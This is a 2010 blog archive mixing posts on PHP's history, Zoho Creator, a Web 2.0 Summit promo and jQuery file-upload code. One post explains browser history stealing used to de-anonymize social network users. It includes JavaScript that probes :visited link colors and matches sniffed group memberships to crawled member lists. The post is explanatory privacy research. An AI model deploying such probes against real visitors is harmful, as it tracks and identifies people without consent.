Wednesday, June 9, 2010
PHP is Fifteen Today!

PHP was released by Rasmus Lerdorf on June 8, 1995. His original usenet post is still available online if you want to examine a computing artefact from the dawn of the web. Many of us owe our careers to the language, so here’s a brief history of PHP…
PHP originally stood for “Personal Home Page” and Rasmus started the project in 1994. PHP was written in C and was intended to replace several Perl scripts he was using on his homepage. Few people will be ancient enough to remember CGI programming in Perl, but it wasn’t much fun. You could not embed code within HTML and development was slow and clunky.
Rasmus added his own Form Interpreter and other C libraries including database connectivity engines. PHP 2.0 was born on this day 15 years ago. PHP had a modest following until the launch of version 3.0 in June 1998. The parser was completely rewritten by Andi Gutmans and Zeev Suraski; they also changed the name to the recursive “PHP: Hypertext Preprocessor”.
Critics argue that PHP 3.0 was insecure, had a messy syntax, and didn’t offer standard language features such as object-oriented programming. Some will quote the same arguments today. However, while PHP lacked elegance, it made web development significantly easier. Programming novices could add snippets of code to their HTML pages, and experts could develop full web applications using an open source technology which became widely installed by web hosts.
PHP 4.0 was released on May 22, 2000. It provided rudimentary object-orientation and addressed several security issues such as disabling register_globals. Scripts broke, but it was relatively easy to adapt applications for the new platform. PHP 4.0 was an instant success and you’ll still find it offered by web hosts today. Popular systems such as WordPress and Drupal still run on PHP 4.0 even though platform development has ceased.
Finally, we come to PHP 5.0, which was released on July 13, 2004. The language featured more robust object-oriented programming plus security and performance enhancements. Uptake has been more sedate owing to the success of PHP 4.0 and the introduction of competing technologies such as ASP.NET, Ruby and Python.
PHP has its inconsistencies and syntactical messiness, but it’s rare you’ll encounter a language which can be installed on almost any OS, is provided by the majority of web hosts, and offers a similar level of productivity and community assistance. Whatever your opinion of the language, PHP has provided a solid foundation for server-side programming and web application development for the past 15 years. Long may it continue.
Tuesday, June 8, 2010
Build your own Web 2.0 apps
Zoho Creator by AdventNet is a web-based interface that allows you to create programs. The whole thing has a rich AJAX interface with a familiar look and feel for users accustomed to AJAX apps in general and other Zoho releases in particular, such as Zoho Planner (reviewed by me before). Creating an application such as a form is easy: the editor does everything for you, and you just provide the content. As soon as the application is built you can easily create one or more views where you can see the results, sorted as you like, and there's also room for reporting. The app looks great for creating data-collection applications such as CRM apps and helpdesk (ticketing) systems. Best of all, you can obtain a link to the application you built and embed it in your website. A nice feature for spreadsheet tigers: you can import spreadsheets to create applications.
Web 2.0 Summit 2010
The Web 2.0 Summit is the only place, once a year, where leaders of the Internet Economy gather to debate and determine business strategy. Join the leadership of this amazing industry this November 15-17 in San Francisco.
Fifteen years and two recessions into the commercial Internet, it's clear that our industry has moved into a competitive phase, a "middlegame" in the battle to dominate the Internet Economy.
At this year's Web 2.0 Summit, we're focusing on these key points of control: strategic chokepoints on an increasingly crowded board. The decisions we make as an industry will determine the fundamental architecture of our society.
We'll use the Summit's program to feature companies that are changing strategy and moving into new fields of battle. We'll map strategic inflection points and identify key players competing to control the services and infrastructure of a websquared world, including:
Mobile and sensor platforms
Distribution
Social graph
Identity services and payment systems
Location services
Data transport
and Advertising
Web 2.0 Summit gathers the intelligence, innovation, and leadership of the Internet and media industries for a conversation that never fails to stimulate, push, and surprise. Only at Web 2.0 Summit will you find in one place:
A conversation with – and new product announcement from – the CEO of GE
A surprise visit from Google founder Sergey Brin
Real-time search announcements from Google, Microsoft, Facebook, and Twitter
Insights from Carly Fiorina, Foursquare CEO Dennis Crowley, Newscorp Digital CEO Jon Miller, Adobe CEO Shantanu Narayen, Intel CEO Paul Otellini, and dozens more
First-ever insights on Comcast’s new web-based platform from CEO Brian Roberts
And the reflections and musings of the Web’s patriarch, Sir Tim Berners-Lee
Be sure to mark your calendars for the seventh annual Web 2.0 Summit, happening November 15-17, 2010. We’re busy working on this year’s speaker schedule (we already have a few surprises for you), but make sure to sign up before all seats are sold out, as they have been for the past five years.
Web 2.0 Summit will return to the Palace Hotel in San Francisco this year. Space is limited and attendance is by invitation only, so submit your request for an invitation today.
Our Best,
John Battelle and Tim O'Reilly
Monday, June 7, 2010
ajaxfileupload
jQuery is a fast and concise JavaScript library that simplifies how you traverse HTML documents, handle events, perform animations, and add Ajax interactions to your web pages.
This AjaxFileUpload plugin is a hacked version of the Ajaxupload plugin created by Øyvind Saltvik, which is really good enough for normal use. Its idea is to create an iframe and submit the specified form to it for further processing.
In this hacked version, it submits only the specified file input element rather than an entire form.
How to use it?
1. Include the jquery.js and ajaxfileupload.js JavaScript files.
2. Create a function to be fired when the upload button is clicked.
e.g.
function ajaxFileUpload()
{
    // Show the loading indicator when the Ajax request starts and hide it when it completes
    $("#loading")
        .ajaxStart(function(){
            $(this).show();
        })
        .ajaxComplete(function(){
            $(this).hide();
        });

    /*
    Preparing the Ajax file upload:
    url: the URL of the script that handles the uploaded files
    secureuri: whether to use a secure protocol (https)
    fileElementId: the id of the file input element; it becomes the index into the $_FILES array
    dataType: the expected response type; json and xml are supported
    success: callback function fired when the Ajax request completes
    error: callback function fired when the Ajax request fails
    */
    $.ajaxFileUpload(
        {
            url: 'doajaxfileupload.php',
            secureuri: false,
            fileElementId: 'fileToUpload',
            dataType: 'json',
            success: function (data, status)
            {
                if (typeof(data.error) != 'undefined')
                {
                    if (data.error != '')
                    {
                        alert(data.error);
                    }
                    else
                    {
                        alert(data.msg);
                    }
                }
            },
            error: function (data, status, e)
            {
                alert(e);
            }
        }
    );
    return false;
}
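For completeness, here is a minimal sketch of the markup and wiring that could sit around the function above. The ids loading and fileToUpload match the example; the button id, file names and paths are assumptions for illustration only.

<!-- Minimal sketch: the script includes from step 1, a hidden loading indicator,
     a file input whose id matches fileElementId, and a button that fires the upload.
     The button id and file paths are assumptions, not part of the plugin. -->
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="ajaxfileupload.js"></script>

<img id="loading" src="loading.gif" style="display:none;" />
<input id="fileToUpload" name="fileToUpload" type="file" />
<button id="buttonUpload">Upload</button>

<script type="text/javascript">
// Fire the upload when the button is clicked; returning false from
// ajaxFileUpload() prevents any default form submission.
$(document).ready(function () {
    $("#buttonUpload").click(function () {
        return ajaxFileUpload();
    });
});
</script>

On the server side, doajaxfileupload.php is expected to return a JSON object with error and msg fields, since that is what the success callback above reads.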
Cookies, Supercookies and Ubercookies: Stealing the Identity of Web Visitors
Cookies. Most people are aware that their web browsing activity over time and across sites can be tracked using cookies. When you are being tracked, it can be deduced that the same person visited certain sites at certain times, but the sites doing the tracking don’t know who you are, i.e., your name, etc., unless you choose to tell them in some way, such as by logging in.
Cookies are easy to delete, and so there’s been a big impetus in the Internet advertising industry to discover and deploy more robust tracking mechanisms.
Supercookies. You may be surprised to find just how helpless a user is against a site (or more usually, a network of sites) that is truly determined to track them. There are Flash cookies, much harder to delete, some of which respawn the regular HTTP cookies that you delete. The EFF’s Panopticlick project demonstrates many “browser fingerprinting” methods which are more sophisticated. (Jonathan Mayer’s senior thesis contained a smaller-scale demonstration of some of those techniques).
A major underlying reason for a lot of these problems is that any browser feature that allows a website to store “state” on the client can be abused for tracking, and there are a bewildering variety of these. There is a great analysis in a paper by my Stanford colleagues. One of the points they make is that co-operative tracking by websites is essentially impossible to defend against.
Ubercookies: history stealing. Now let’s get to the scary stuff: uncovering identity. History stealing or history sniffing is an unintended consequence of the way the web is designed; it allows a website to learn which URLs you’ve been to. While a site can’t simply ask your browser for a list of visited URLs, it can ask “yes/no” questions and your browser will faithfully respond. The most common way of doing this is by injecting invisible links into the page using Javascript and exploiting the fact that the CSS link color attribute depends on whether the link has been visited or not.
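To make the mechanism concrete, here is a minimal JavaScript sketch of such a probe; the probe colors and the candidate URL are illustrative assumptions, and modern browsers now report the unvisited style from getComputedStyle, which blunts exactly this trick.

// Minimal sketch of a CSS :visited probe (circa 2010). The page defines distinct
// colors for visited and unvisited probe links, injects an invisible link, and
// reads back its computed color. The URL tested below is purely illustrative.
var style = document.createElement('style');
style.textContent = 'a.probe:link { color: rgb(0, 0, 255); } ' +
                    'a.probe:visited { color: rgb(255, 0, 0); }';
document.getElementsByTagName('head')[0].appendChild(style);

function wasVisited(url) {
    var link = document.createElement('a');
    link.className = 'probe';
    link.href = url;
    link.style.visibility = 'hidden';      // keep the probe invisible
    document.body.appendChild(link);
    var color = window.getComputedStyle(link, null).getPropertyValue('color');
    document.body.removeChild(link);
    return color === 'rgb(255, 0, 0)';     // the :visited color defined above
}

// One "yes/no" question: has this browser been to this (made-up) group page?
if (wasVisited('http://social-network.example.com/groups/12345')) {
    // record the hit and move on to the next candidate URL
}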
History stealing has been known for a decade, and browser vendors have failed to fix it because it cannot be fixed without sacrificing some useful functionality (the crude way is to turn off visited link coloring altogether; a subtler solution is SafeHistory). Increasingly worse consequences have been discovered over the years: for example, a malicious site can learn which bank you use and customize a phishing page accordingly. But a paper (full text, PDF) coming out at this year’s IEEE S&P conference at Oakland takes it to a new level.
Identity. Let’s pause for a second and think about what finding your identity means. In the modern, social web, social network accounts have become our de-facto online identities, and most people reveal their name and at least some other real-world information about themselves on their profiles. So if the attacker can discover the URL of your social network profile, we can agree that he has identified you for all practical purposes. And the new paper shows how to do just that.
The attack relies on the following observations:
Almost all social networking sites have some kind of “group” functionality: users can add themselves to groups.
Users typically add themselves to multiple groups, at least some of which are public.
Group affiliations, just like your movie-watching history and many other types of attributes, are sufficient to fingerprint a user. There’s a high chance there’s no one else who belongs to the same set of groups that you do (or is even close). [Aside: I used this fact to show that Lending Club data can be de-anonymized.]
Users who belong to a group are likely to visit group-specific URLs that are predictable.
Put the above facts together, and the attack emerges: the attacker (an arbitrary website you visit, without the co-operation of whichever social network is used as an attack enabler) uses history stealing to test a bunch of group-related URLs one by one until he finds a few (public) groups that the anonymous user probably belongs to. The attacker has already crawled the social network, and therefore knows which user belongs to which groups. Now he puts two and two together: using the list of groups he got from the browser, he does a search on the backend to find the (usually unique) user who belongs to all those groups.
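As a rough sketch of that last step, assume the attacker has already crawled the public membership lists; all names and data below are made up. The backend lookup can then be as simple as ranking users by how many of the sniffed groups they belong to.

// crawledGroups maps a group id to the (public) members the attacker crawled earlier;
// groupsFromHistory is the list of group ids recovered via history stealing.
function candidateUsers(crawledGroups, groupsFromHistory) {
    var counts = {};                                   // user -> number of matched groups
    groupsFromHistory.forEach(function (groupId) {
        (crawledGroups[groupId] || []).forEach(function (user) {
            counts[user] = (counts[user] || 0) + 1;
        });
    });
    // Sort users by how many of the sniffed groups they belong to;
    // the top candidate is very often a unique match.
    return Object.keys(counts).sort(function (a, b) {
        return counts[b] - counts[a];
    });
}

var crawledGroups = {
    'gardening': ['alice', 'bob'],
    'chess':     ['alice', 'carol'],
    'marathon':  ['alice', 'dave']
};
alert(candidateUsers(crawledGroups, ['gardening', 'chess', 'marathon'])[0]);  // "alice"

The paper's actual algorithm is more careful than this, but the ranking view shows why a handful of group hits is usually enough to single out one user.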
Needless to say, this is a somewhat simplified description. The algorithm can be easily modified so that it will work even if some of the groups have disappeared from your history (say because you clear it once in a while) or if you’ve visited groups you’re not a member of. The authors demonstrated the attack with real users on the Xing network, and also showed theoretically that it is feasible on a number of other social networks including Facebook and Myspace. It takes a few thousand Javascript queries and runs in a few seconds on modern browsers, which makes it pretty much surreptitious.
Fallout. There are only two ways to try to fix this. The first is for all the social networking sites to change their URL patterns by randomizing them so that point 4 above (predictable URL identifying that you belong to a group) is no longer true. The second is for all the browser vendors to fix their browsers so that history stealing is no longer possible.
The authors contacted several of the social networks; Xing quickly implemented the URL randomization fix, which I find surprising and impressive. Ultimately, however, Xing’s move will probably be no more than a nice gesture, for the following reason.
Over the last few days, I have been working on a stronger version of this attack which:
can make use of every URL in the browser history to try and identify the user. This means that server-side fixes are not possible, because literally every site on the web would need to implement randomization.
avoids the costly crawling step, further lowering the bar to executing the attack.
That leaves browser-based fixes for history stealing, which haven’t happened in the 10 years that the problem has been known. Will browser vendors finally accept the functionality hit and deal with the problem? We can hope so, but it remains to be seen.
In the next article, I will describe the stronger attack and also explain in more detail why your profile page on almost any website is a very strong identifier.
Thanks to Adam Bossy for reviewing a draft.
AddThis Makes Sharing Easy for Blogs, Websites and Flash
Largest collection of services, and growing.
Your content can now be shared to more services than ever before. Popular sites like Facebook, Twitter, and Digg... Sites popular in other countries like Meneame, Hatena, and NUjij... and even new utilities like Instapaper, Google Translate, and PDFthis. The best part is, the AddThis Service Directory is growing and automatically helps to keep your sharing tools up-to-date with these new services, so you don't have to.